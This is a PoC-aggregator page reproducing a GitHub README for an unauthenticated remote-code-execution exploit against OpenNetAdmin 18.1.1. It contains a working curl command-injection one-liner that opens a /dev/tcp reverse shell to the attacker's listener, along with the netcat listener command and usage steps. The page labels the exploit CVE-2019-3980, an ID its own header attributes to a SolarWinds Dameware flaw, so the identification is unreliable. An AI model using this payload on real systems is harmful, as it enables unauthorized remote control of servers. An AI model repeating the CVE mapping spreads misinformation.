POC详情: ffef9744084a44a095d31e7acf0bf9ddc299a43e

来源
关联漏洞
标题: Solarwinds Dameware Mini Remote Control agent 输入验证错误漏洞 (CVE-2019-3980)
描述:SolarWinds DameWare Mini Remote Control是美国SolarWinds公司的一款远程控制软件和桌面共享工具。agent是其中的一个代理程序。 Solarwinds Dameware Mini Remote Control agent v12.1.0.89版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。
介绍
# CVE-2019-3980 – OpenNetAdmin 18.1.1 Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended **strictly for educational and research purposes only**.  
The information and code provided here can be used in **controlled environments**, such as private lab machines.  
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**  
The author is **not responsible** for any misuse or damages caused.

---

## 🔍 About the Vulnerability

A Remote Code Execution vulnerability exists in **OpenNetAdmin 18.1.1** via the `xajax` AJAX request interface.  
The vulnerability arises from improper input sanitization, allowing command injection via a crafted POST request to `/ona/`.  
This exploit leverages the `tooltips` plugin to trigger a reverse shell back to the attacker's listener.

- **CVE ID:** CVE-2019-3980  
- **Exploit-DB ID:** [47691](https://www.exploit-db.com/exploits/47691)  
- **Vulnerable Application:** OpenNetAdmin 18.1.1  
- **Affected Parameter:** `xajaxargs[]`  
- **Impact:** Remote Code Execution  
- **Authentication Required:** ❌ No  
- **Network Access Required:** ✅ Yes  

---

## 📂 Exploit Overview

- **Exploit Type:** Command Injection → Reverse Shell  
- **Exploit Title:** OpenNetAdmin 18.1.1 – Unauthenticated RCE  
- **ExploitDB ID:** 47691  
- **Language:** Bash (via `curl`)  
- **Authentication Required:** ❌ No  

---

## ⚙️ Exploit Code

This customized Bash one-liner sends a POST request to the vulnerable `xajax=window_submit` endpoint with injected reverse shell code.

```bash
#!/bin/bash

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```

> 🛠️ **Note:**  
Replace `<YOUR-IP>` and `<YOUR-PORT>` with your Netcat listener IP and port.  
Start your listener using:
```bash
nc -nlvp <PORT>
```

---

## 🎯 Demonstration

### 1. Showing the ONA Web Page and Version

![ONA Web Interface](./img/ona.png)  
> Screenshot of the vulnerable OpenNetAdmin interface and version.

---

## 🚀 Exploit Usage

### 2. Ran the Exploit

```bash
bash shell.sh
```

![Exploit Execution](./img/exploit.png)  
> Screenshot of the script execution triggering the payload.

---

## 🐚 Reverse Shell

### 3. Reverse Shell Obtained

```bash
nc -nlvp <PORT>
```

![Reverse Shell](./img/shell.png)  
> Reverse shell caught as `www-data`.

---

## 📚 References

- [Exploit-DB: CVE-2019-3980](https://www.exploit-db.com/exploits/47691)  
- [NVD CVE Info](https://nvd.nist.gov/vuln/detail/CVE-2019-3980)

---

## 📝 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/opennetadmin-18-1-1-remote-code-execution-exploit-db-47691-7c25c9b0ea68)**
文件快照

[4.0K] /data/pocs/ffef9744084a44a095d31e7acf0bf9ddc299a43e ├── [4.0K] img │   ├── [ 49K] exploit.png │   ├── [139K] ona.png │   └── [ 76K] shell.png └── [3.0K] README.md 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。